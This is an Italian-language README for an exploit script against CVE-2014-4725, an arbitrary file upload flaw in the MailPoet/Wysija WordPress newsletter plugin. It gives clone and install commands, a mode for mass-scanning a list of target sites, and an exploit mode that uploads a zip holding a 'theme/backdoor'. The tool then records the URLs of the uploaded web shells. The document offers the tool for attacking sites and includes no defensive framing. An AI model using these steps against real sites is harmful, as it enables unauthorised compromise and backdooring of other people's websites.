
MailPoet Newsletters <= Caricamento Arbitrario di File (exploiter)
Questo script è utilizzato per scansionare e sfruttare la vulnerabilità CVE-2014-4725 (mailpoet/wysija newsletters) in wordpress.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
scansione dei target
python exploit.py --scan targets.txt
targets.txt contiene una lista di target (uno per riga, senza http://)
sfruttamento dei target
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt contiene target già confermati vulnerabili
--payload è il file zip contenente il tema/backdoor da caricare
output
vuln.txt > lista dei target vulnerabili
shell.txt > url delle shell caricate